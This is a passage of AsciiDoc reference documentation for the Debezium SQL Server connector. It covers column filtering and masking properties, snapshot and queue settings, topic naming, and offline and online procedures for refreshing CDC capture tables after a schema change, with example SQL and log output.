{prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +\nIf you include this property in the configuration, do not also set the `table.include.list` property.\n\n|[[sqlserver-property-column-include-list]]<<sqlserver-property-column-include-list, `+column.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in the change event message values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nNote that primary key columns are always included in the event's key, even if not included in the value. +\n\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +\nIf you include this property in the configuration, do not also set the `column.exclude.list` property.\n\n|[[sqlserver-property-column-exclude-list]]<<sqlserver-property-column-exclude-list, `+column.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nNote that primary key columns are always included in the event's key, also if excluded from the value. +\n\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +\nIf you include this property in the configuration, do not also set the `column.include.list` property.\n\n|[[sqlserver-property-column-mask-hash]]<<sqlserver-property-column-mask-hash, `column.mask.hash._hashAlgorithm_.with.salt._salt_`>>;\n[[sqlserver-property-column-mask-hash-v2]]<<sqlserver-property-column-mask-hash-v2, `column.mask.hash.v2._hashAlgorithm_.with.salt._salt_`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nFully-qualified names for columns are of the form _`<schemaName>_._<tableName>_._<columnName>`. +\nTo match the name of a column {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\nIn the resulting change event record, the values for the specified columns are replaced with pseudonyms. +\n\nA pseudonym consists of the hashed value that results from applying the specified _hashAlgorithm_ and _salt_.\nBased on the hash function that is used, referential integrity is maintained, while column values are replaced with pseudonyms.\nSupported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. +\n +\nIn the following example, `CzQMA0cB5K` is a randomly selected salt. +\n\n----\ncolumn.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName\n----\n\nIf necessary, the pseudonym is automatically shortened to the length of the column.\nThe connector configuration can include multiple properties that specify different hash algorithms and salts. +\n +\nDepending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting data set might not be completely masked. +\n +\nHashing strategy version 2 should be used to ensure fidelity if the value is being hashed in different places or systems.\n\n|[[sqlserver-property-time-precision-mode]]<<sqlserver-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive` (the default) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which uses millisecond precision regardless of the database columns' precision. See xref:{link-sqlserver-connector}#sqlserver-temporal-values[temporal values].\n\n|[[sqlserver-property-decimal-handling-mode]]<<sqlserver-property-decimal-handling-mode,`+decimal.handling.mode+`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[sqlserver-property-include-schema-changes]]<<sqlserver-property-include-schema-changes, `+include.schema.changes+`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database schema history. The default is `true`.\n\n|[[sqlserver-property-tombstones-on-delete]]<<sqlserver-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[sqlserver-property-column-truncate-to-length-chars]]<<sqlserver-property-column-truncate-to-length-chars, `column.truncate.to._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nSet this property if you want to truncate the data in a set of columns when it exceeds the number of characters specified by the _length_ in the property name.\nSet `length` to a positive integer value, for example, `column.truncate.to.20.chars`.\n\nThe fully-qualified name of a column observes the following format: `_<schemaName>_._<tableName>_._<columnName>_`.\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\nYou can specify multiple properties with different lengths in a single configuration.\n\n|[[sqlserver-property-column-mask-with-length-chars]]<<sqlserver-property-column-mask-with-length-chars, `column.mask.with._length_.chars`>>\n|_n\/a_\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nSet this property if you want the connector to mask the values for a set of columns, for example, if they contain sensitive data.\nSet `_length_` to a positive integer to replace data in the specified columns with the number of asterisk (`*`) characters specified by the _length_ in the property name.\nSet _length_ to `0` (zero) to replace data in the specified columns with an empty string.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_.\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\nYou can specify multiple properties with different lengths in a single configuration.\n\n|[[sqlserver-property-column-propagate-source-type]]<<sqlserver-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns for which you want the connector to emit extra parameters that represent column metadata.\nWhen this property is set, the connector adds the following fields to the schema of event records:\n\n* `pass:[_]pass:[_]debezium.source.column.type` +\n* `pass:[_]pass:[_]debezium.source.column.length` +\n* `pass:[_]pass:[_]debezium.source.column.scale` +\n\nThese parameters propagate a column's original type name and length (for variable-width types), respectively. +\nEnabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_. +\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\n|[[sqlserver-property-datatype-propagate-source-type]]<<sqlserver-property-datatype-propagate-source-type,`+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that specify the fully-qualified names of data types that are defined for columns in a database.\nWhen this property is set, for columns with matching data types, the connector emits event records that include the following extra fields in their schema:\n\n* `pass:[_]pass:[_]debezium.source.column.type` +\n* `pass:[_]pass:[_]debezium.source.column.length` +\n* `pass:[_]pass:[_]debezium.source.column.scale` +\n\nThese parameters propagate a column's original type name and length (for variable-width types), respectively. +\nEnabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._typeName_. +\nTo match the name of a data type, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the data type; the expression does not match substrings that might be present in a type name.\n\nFor the list of SQL Server-specific data type names, see the xref:sqlserver-data-types[SQL Server data type mappings].\n\n|[[sqlserver-property-message-key-columns]]<<sqlserver-property-message-key-columns, `+message.key.columns+`>>\n|_n\/a_\n|A list of expressions that specify the columns that the connector uses to form custom message keys for change event records that it publishes to the Kafka topics for specified tables.\n\nBy default, {prodname} uses the primary key column of a table as the message key for records that it emits.\nIn place of the default, or to specify a key for tables that lack a primary key, you can configure custom message keys based on one or more columns. +\n +\nTo establish a custom message key for a table, list the table, followed by the columns to use as the message key.\nEach list entry takes the following format: +\n +\n`_<fully-qualified_tableName>_:__<keyColumn>__,_<keyColumn>_` +\n +\nTo base a table key on multiple column names, insert commas between the column names.\n\nEach fully-qualified table name is a regular expression in the following format: +\n +\n`_<schemaName>_._<tableName>_` +\n +\nThe property can include entries for multiple tables.\nUse a semicolon to separate table entries in the list. +\n +\nThe following example sets the message key for the tables `inventory.customers` and `purchase.orders`: +\n +\n`inventory.customers:pk1,pk2;(.*).purchaseorders:pk3,pk4` +\n +\nFor the table `inventory.customer`, the columns `pk1` and `pk2` are specified as the message key.\nFor the `purchaseorders` tables in any schema, the columns `pk3` and `pk4` server as the message key.\n\nThere is no limit to the number of columns that you use to create custom message keys.\nHowever, it's best to use the minimum number that are required to specify a unique key.\n\n|[[sqlserver-property-binary-handling-mode]]<<sqlserver-property-binary-handling-mode, `+binary.handling.mode+`>>\n|bytes\n|Specifies how binary (`binary`, `varbinary`) columns should be represented in change events, including: `bytes` represents binary data as byte array (default), `base64` represents binary data as base64-encoded String, `base64-url-safe` represents binary data as base64-url-safe-encoded String, `hex` represents binary data as hex-encoded (base16) String\n\n|[[sqlserver-property-schema-name-adjustment-mode]]<<sqlserver-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>\n|none\n|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +\n\n* `none` does not apply any adjustment. +\n* `avro` replaces the characters that cannot be used in the Avro type name with underscore. +\n\n|===\n\n[id=\"sqlserver-advanced-connector-configuration-properties\"]\n==== Advanced SQL Server connector configuration properties\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[sqlserver-property-converters]]<<sqlserver-property-converters, `converters`>>\n|No default\n|Enumerates a comma-separated list of the symbolic names of the {link-prefix}:{link-custom-converters}#custom-converters[custom converter] instances that the connector can use.\nFor example, +\n\n`isbn`\n\nYou must set the `converters` property to enable the connector to use a custom converter.\n\nFor each converter that you configure for a connector, you must also add a `.type` property, which specifies the fully-qualifed name of the class that implements the converter interface.\nThe `.type` property uses the following format: +\n\n`_<converterSymbolicName>_.type` +\n\nFor example, +\n\n isbn.type: io.debezium.test.IsbnConverter\n\nIf you want to further control the behavior of a configured converter, you can add one or more configuration parameters to pass values to the converter.\nTo associate any additional configuration parameter with a converter, prefix the parameter names with the symbolic name of the converter.\nFor example, +\n\n isbn.schema.name: io.debezium.sqlserver.type.Isbn\n\n|[[sqlserver-property-snapshot-mode]]<<sqlserver-property-snapshot-mode, `+snapshot.mode+`>>\n|_initial_\n|A mode for taking an initial snapshot of the structure and optionally data of captured tables.\nOnce the snapshot is complete, the connector will continue reading change events from the database's redo logs.\nThe following values are supported:\n\n* `initial`: Takes a snapshot of structure and data of captured tables; useful if topics should be populated with a complete representation of the data from the captured tables. +\n* `initial_only`: Takes a snapshot of structure and data like `initial` but instead does not transition into streaming changes once the snapshot has completed. +\n* `schema_only`: Takes a snapshot of the structure of captured tables only; useful if only changes happening from now onwards should be propagated to topics.\n\n|[[sqlserver-property-snapshot-include-collection-list]]<<sqlserver-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All tables specified in `table.include.list`\n|An optional, comma-separated list of regular expressions that match the fully-qualified names (`_<dbName>_._<schemaName>_._<tableName>_`) of the tables to include in a snapshot.\nThe specified items must be named in the connector's xref:{context}-property-table-include-list[`table.include.list`] property.\nThis property takes effect only if the connector's xref:sqlserver-property-snapshot-mode[`snapshot.mode`] property is set to a value other than `never`. +\nThis property does not affect the behavior of incremental snapshots. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name.\n\n|[[sqlserver-property-snapshot-isolation-mode]]<<sqlserver-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>\n|_repeatable_read_\n|Mode to control which transaction isolation level is used and how long the connector locks tables that are designated for capture.\nThe following values are supported:\n\n* `read_uncommitted`\n* `read_committed`\n* `repeatable_read`\n* `snapshot`\n* `exclusive` (`exclusive` mode uses repeatable read isolation level, however, it takes the exclusive lock on all tables\nto be read). +\n\nThe `snapshot`, `read_committed` and `read_uncommitted` modes do not prevent other\ntransactions from updating table rows during initial snapshot.\nThe `exclusive` and `repeatable_read` modes do prevent concurrent updates. +\n\nMode choice also affects data consistency. Only `exclusive` and `snapshot` modes guarantee full consistency, that is, initial\nsnapshot and streaming logs constitute a linear history.\nIn case of `repeatable_read` and `read_committed` modes, it might happen that, for instance, a record added appears\ntwice - once in initial snapshot and once in streaming phase. Nonetheless, that consistency level should do for\ndata mirroring.\nFor `read_uncommitted` there are no data consistency guarantees at all (some data might be lost or corrupted).\n\n|[[sqlserver-property-event-processing-failure-handling-mode]]<<sqlserver-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events.\n`fail` will propagate the exception (indicating the offset of the problematic event), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the offset of the problematic event to be logged. +\n`skip` will cause the problematic event to be skipped.\n\n|[[sqlserver-property-poll-interval-ms]]<<sqlserver-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`500`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|[[sqlserver-property-max-queue-size]]<<sqlserver-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[sqlserver-property-max-queue-size-in-bytes]]<<sqlserver-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:sqlserver-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[sqlserver-property-max-batch-size]]<<sqlserver-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector.\n\n|[[sqlserver-property-heartbeat-interval-ms]]<<sqlserver-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends messages to a heartbeat topic.\nThe property can be used to confirm whether the connector is still receiving change events from the database.\nYou also should leverage heartbeat messages in cases where only records in non-captured tables are changed for a longer period of time.\nIn such situation the connector would proceed to read the log from the database but never emit any change messages into Kafka,\nwhich in turn means that no offset updates are committed to Kafka.\nThis may result in more change events to be re-sent after a connector restart.\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|[[sqlserver-property-snapshot-delay-ms]]<<sqlserver-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|No default\n|An interval in milli-seconds that the connector should wait before taking a snapshot after starting up; +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|[[sqlserver-property-snapshot-fetch-size]]<<sqlserver-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`2000`\n|Specifies the maximum number of rows that should be read in one go from each table while taking a snapshot.\nThe connector will read the table contents in multiple batches of this size. Defaults to 2000.\n\n|[[sqlserver-property-query-fetch-size]]<<sqlserver-property-query-fetch-size, `+query.fetch.size+`>>\n|No default\n|Specifies the number of rows that will be fetched for each database round-trip of a given query.\nDefaults to the JDBC driver's default fetch size.\n\n|[[sqlserver-property-snapshot-lock-timeout-ms]]<<sqlserver-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|An integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If table locks cannot be acquired in this time interval, the snapshot will fail (also see xref:{link-sqlserver-connector}#sqlserver-snapshots[snapshots]). +\nWhen set to `0` the connector will fail immediately when it cannot obtain the lock. Value `-1` indicates infinite waiting.\n\n|[[sqlserver-property-snapshot-select-statement-overrides]]<<sqlserver-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|No default\n|Specifies the table rows to include in a snapshot.\nUse the property if you want a snapshot to include only a subset of the rows in a table.\nThis property affects snapshots only.\nIt does not apply to events that the connector reads from the log.\n\nThe property contains a comma-separated list of fully-qualified table names in the form `_<schemaName>.<tableName>_`. For example, +\n +\n`+\"snapshot.select.statement.overrides\": \"inventory.products,customers.orders\"+` +\n +\nFor each table in the list, add a further configuration property that specifies the `SELECT` statement for the connector to run on the table when it takes a snapshot.\nThe specified `SELECT` statement determines the subset of table rows to include in the snapshot.\nUse the following format to specify the name of this `SELECT` statement property: +\n +\n`snapshot.select.statement.overrides._<schemaName>_._<tableName>_`.\nFor example,\n`snapshot.select.statement.overrides.customers.orders`. +\n +\nExample:\n\nFrom a `customers.orders` table that includes the soft-delete column, `delete_flag`, add the following properties if you want a snapshot to include only those records that are not soft-deleted:\n\n----\n\"snapshot.select.statement.overrides\": \"customer.orders\",\n\"snapshot.select.statement.overrides.customer.orders\": \"SELECT * FROM [customers].[orders] WHERE delete_flag = 0 ORDER BY id DESC\"\n----\n\nIn the resulting snapshot, the connector includes only the records for which `delete_flag = 0`.\nifdef::community[]\n|[[sqlserver-property-source-struct-version]]<<sqlserver-property-source-struct-version, `+source.struct.version+`>>\n|v2\n|Schema version for the `source` block in CDC events; {prodname} 0.10 introduced a few breaking +\nchanges to the structure of the `source` block in order to unify the exposed structure across\nall the connectors. +\nBy setting this option to `v1` the structure used in earlier versions can be produced.\nNote that this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[sqlserver-property-sanitize-field-names]]<<sqlserver-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.\n|Whether field names are sanitized to adhere to Avro naming requirements.\nSee xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.\n\n|[[sqlserver-property-provide-transaction-metadata]]<<sqlserver-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|When set to `true` {prodname} generates events with transaction boundaries and enriches data events envelope with transaction metadata.\n\n|[[sqlserver-property-retriable-restart-connector-wait-ms]]<<sqlserver-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>> +\n|10000 (10 seconds)\n|The number of milli-seconds to wait before restarting a connector after a retriable error occurs.\n\n|[[sqlserver-property-skipped-operations]]<<sqlserver-property-skipped-operations, `+skipped.operations+`>>\n|`t`\n|A comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, `d` for deletes, `t` for truncates, and `none` to not skip any operations.\nBy default, truncate operations are skipped (not emitted by this connector).\n\n|[[sqlserver-property-signal-data-collection]]<<sqlserver-property-signal-data-collection,`+signal.data.collection+`>>\n|No default value\n| Fully-qualified name of the data collection that is used to send xref:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector. +\nUse the following format to specify the collection name: +\n`_<databaseName>_._<schemaName>_._<tableName>_`\n\n|[[sqlserver-property-incremental-snapshot-allow-schema-changes]]<<sqlserver-property-incremental-snapshot-allow-schema-changes, `+incremental.snapshot.allow.schema.changes+`>>\n|`false`\n| Allow schema changes during an incremental snapshot. When enabled the connector will detect schema change during an incremental snapshot and re-select a current chunk to avoid locking DDLs. +\n +\nNote that changes to a primary key are not supported and can cause incorrect results if performed during an incremental snapshot. Another limitation is that if a schema change affects only columns' default values, then the change won't be detected until the DDL is processed from the binlog stream. This doesn't affect the snapshot events' values, but the schema of snapshot events may have outdated defaults.\n\n|[[sqlserver-property-incremental-snapshot-chunk-size]]<<sqlserver-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>\n|`1024`\n|The maximum number of rows that the connector fetches and reads into memory during an incremental snapshot chunk.\nIncreasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.\nHowever, larger chunk sizes also require more memory to buffer the snapshot data.\nAdjust the chunk size to a value that provides the best performance in your environment.\n\n|[[sqlserver-property-max-iteration-transactions]]<<sqlserver-property-max-iteration-transactions, `+max.iteration.transactions+`>>\n|0\n|Specifies the maximum number of transactions per iteration to be used to reduce the memory footprint when streaming changes from multiple tables in a database.\nWhen set to `0` (the default), the connector uses the current maximum LSN as the range to fetch changes from.\nWhen set to a value greater than zero, the connector uses the n-th LSN specified by this setting as the range to fetch changes from.\n\n|[[sqlserver-property-incremental-snapshot-option-recompile]]<<sqlserver-property-incremental-snapshot-option-recompile, `+incremental.snapshot.option.recompile+`>>\n|`false`\n|Uses OPTION(RECOMPILE) query option to all SELECT statements used during an incremental snapshot. This can help to solve parameter sniffing issues that may occur but can cause increased CPU load on the source database, depending on the frequency of query execution.\n\n|[[sqlserver-property-topic-naming-strategy]]<<sqlserver-property-topic-naming-strategy, `topic.naming.strategy`>>\n|`io.debezium.schema.SchemaTopicNamingStrategy`\n|The name of the TopicNamingStrategy class that should be used to determine the topic name for data change, schema change, transaction, heartbeat event etc., defaults to `SchemaTopicNamingStrategy`.\n\n|[[sqlserver-property-topic-delimiter]]<<sqlserver-property-topic-delimiter, `topic.delimiter`>>\n|`.`\n|Specify the delimiter for topic name, defaults to `.`.\n\n|[[sqlserver-property-topic-cache-size]]<<sqlserver-property-topic-cache-size, `topic.cache.size`>>\n|`10000`\n|The size used for holding the topic names in bounded concurrent hash map. This cache will help to determine the topic name corresponding to a given data collection.\n\n|[[sqlserver-property-topic-heartbeat-prefix]]<<sqlserver-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_topic.heartbeat.prefix_._topic.prefix_ +\n +\nFor example, if the topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[sqlserver-property-topic-transaction]]<<sqlserver-property-topic-transaction, `topic.transaction`>>\n|`transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. The topic name has this pattern: +\n +\n_topic.prefix_._topic.transaction_ +\n +\nFor example, if the topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.\n\nFor more information, see xref:sqlserver-transaction-metadata[Transaction Metadata].\n\n|===\n\n[id=\"debezium-sqlserver-connector-database-history-configuration-properties\"]\n==== {prodname} SQL Server connector database schema history configuration properties\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-configuration-database-history-properties.adoc[leveloffset=+1]\n\n[id=\"debezium-sqlserver-connector-pass-through-database-driver-configuration-properties\"]\n==== {prodname} SQL Server connector pass-through database driver configuration properties\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-pass-through-database-driver-configuration-properties.adoc[leveloffset=+1]\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: refreshing-capture-tables-after-a-schema-change\n\/\/ Title: Refreshing capture tables after a schema change\n[[sqlserver-schema-evolution]]\n== Database schema evolution\n\nWhen change data capture is enabled for a SQL Server table, as changes occur in the table, event records are persisted to a capture table on the server.\nIf you introduce a change in the structure of the source table change, for example, by adding a new column, that change is not dynamically reflected in the change table.\nFor as long as the capture table continues to use the outdated schema, the {prodname} connector is unable to emit data change events for the table correctly.\nYou must intervene to refresh the capture table to enable the connector to resume processing change events.\n\nBecause of the way that CDC is implemented in SQL Server, you cannot use {prodname} to update capture tables.\nTo refresh capture tables, one must be a SQL Server database operator with elevated privileges.\nAs a {prodname} user, you must coordinate tasks with the SQL Server database operator to complete the schema refresh and restore streaming to Kafka topics.\n\nYou can use one of the following methods to update capture tables after a schema change:\n\n* xref:{link-sqlserver-connector}#offline-schema-updates[Offline schema updates] require you to stop the {prodname} connector before you can update capture tables.\n* xref:{link-sqlserver-connector}#online-schema-updates[Online schema updates] can update capture tables while the {prodname} connector is running.\n\nThere are advantages and disadvantages to using each type of procedure.\n\n[WARNING]\n====\nWhether you use the online or offline update method, you must complete the entire schema update process before you apply subsequent schema updates on the same source table.\nThe best practice is to execute all DDLs in a single batch so the procedure can be run only once.\n====\n\n[NOTE]\n====\nSome schema changes are not supported on source tables that have CDC enabled.\nFor example, if CDC is enabled on a table, SQL Server does not allow you to change the schema of the table if you renamed one of its columns or changed the column type.\n====\n\n[NOTE]\n====\nAfter you change a column in a source table from `NULL` to `NOT NULL` or vice versa, the SQL Server connector cannot correctly capture the changed information until after you create a new capture instance.\nIf you do not create a new capture table after a change to the column designation, change event records that the connector emits do not correctly indicate whether the column is optional.\nThat is, columns that were previously defined as optional (or `NULL`) continue to be, despite now being defined as `NOT NULL`.\nSimilarly, columns that had been defined as required (`NOT NULL`), retain that designation, although they are now defined as `NULL`.\n====\n\n\/\/ Type: procedure\n\/\/ ModuleID: debezium-sql-server-connector-running-an-offline-update-after-a-schema-change\n\/\/ Title: Running an offline update after a schema change\n[id=\"offline-schema-updates\"]\n=== Offline schema updates\n\nOffline schema updates provide the safest method for updating capture tables.\nHowever, offline updates might not be feasible for use with applications that require high-availability.\n\n.Prerequisites\n* An update was committed to the schema of a SQL Server table that has CDC enabled.\n* You are a SQL Server database operator with elevated privileges.\n\n.Procedure\n\n1. Suspend the application that updates the database.\n2. Wait for the {prodname} connector to stream all unstreamed change event records.\n3. Stop the {prodname} connector.\n4. Apply all changes to the source table schema.\n5. Create a new capture table for the update source table using `sys.sp_cdc_enable_table` procedure with a unique value for parameter `@capture_instance`.\n6. Resume the application that you suspended in Step 1.\n7. Start the {prodname} connector.\n8. After the {prodname} connector starts streaming from the new capture table, drop the old capture table by running the stored procedure `sys.sp_cdc_disable_table` with the parameter `@capture_instance` set to the old capture instance name.\n\n\/\/ Type: procedure\n\/\/ ModuleID: debezium-sql-server-connector-running-an-online-update-after-a-schema-change\n\/\/ Title: Running an online update after a schema change\n[id=\"online-schema-updates\"]\n=== Online schema updates\n\nThe procedure for completing an online schema updates is simpler than the procedure for running an offline schema update,\nand you can complete it without requiring any downtime in application and data processing.\nHowever, with online schema updates, a potential processing gap can occur after you update the schema in the source database,\nbut before you create the new capture instance.\nDuring that interval, change events continue to be captured by the old instance of the change table,\nand the change data that is saved to the old table retains the structure of the earlier schema.\nSo, for example, if you added a new column to a source table, change events that are produced before the new capture table is ready, do not contain a field for the new column.\nIf your application does not tolerate such a transition period, it is best to use the offline schema update procedure.\n\n.Prerequisites\n* An update was committed to the schema of a SQL Server table that has CDC enabled.\n* You are a SQL Server database operator with elevated privileges.\n\n.Procedure\n1. Apply all changes to the source table schema.\n2. Create a new capture table for the update source table by running the `sys.sp_cdc_enable_table` stored procedure with a unique value for the parameter `@capture_instance`.\n3. When {prodname} starts streaming from the new capture table, you can drop the old capture table by running the `sys.sp_cdc_disable_table` stored procedure with the parameter `@capture_instance` set to the old capture instance name.\n\n\n.Example: Running an online schema update after a database schema change\nifdef::community[]\nLet's deploy the SQL Server based https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/tutorial#using-sql-server[{prodname} tutorial] to demonstrate the online schema update.\n\nIn the following example, a column `phone_number` is added to the `customers` table.\n\n. Type the following command to start the database shell:\n[source,shell]\n----\ndocker-compose -f docker-compose-sqlserver.yaml exec sqlserver bash -c '\/opt\/mssql-tools\/bin\/sqlcmd -U sa -P $SA_PASSWORD -d testDB'\n----\nendif::community[]\n\nifdef::product[]\n\nThe following example shows how to complete an online schema update in the change table after the column `phone_number` is added to the `customers` source table.\n\nendif::product[]\n\n. Modify the schema of the `customers` source table by running the following query to add the `phone_number` field:\n+\n[source,sql]\n----\nALTER TABLE customers ADD phone_number VARCHAR(32);\n----\n\n. Create the new capture instance by running the `sys.sp_cdc_enable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_enable_table @source_schema = 'dbo', @source_name = 'customers', @role_name = NULL, @supports_net_changes = 0, @capture_instance = 'dbo_customers_v2';\nGO\n----\n\n. Insert new data into the `customers` table by running the following query:\n[source,sql]\n+\n----\nINSERT INTO customers(first_name,last_name,email,phone_number) VALUES ('John','Doe','john.doe@example.com', '+1-555-123456');\nGO\n----\n+\nThe Kafka Connect log reports on configuration updates through entries similar to the following message:\n+\n[source,shell]\n----\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Multiple capture instances present for the same table: Capture instance \"dbo_customers\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_CT, startLsn=00000024:00000d98:0036, changeTableObjectId=1525580473, stopLsn=00000025:00000ef8:0048] and Capture instance \"dbo_customers_v2\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] 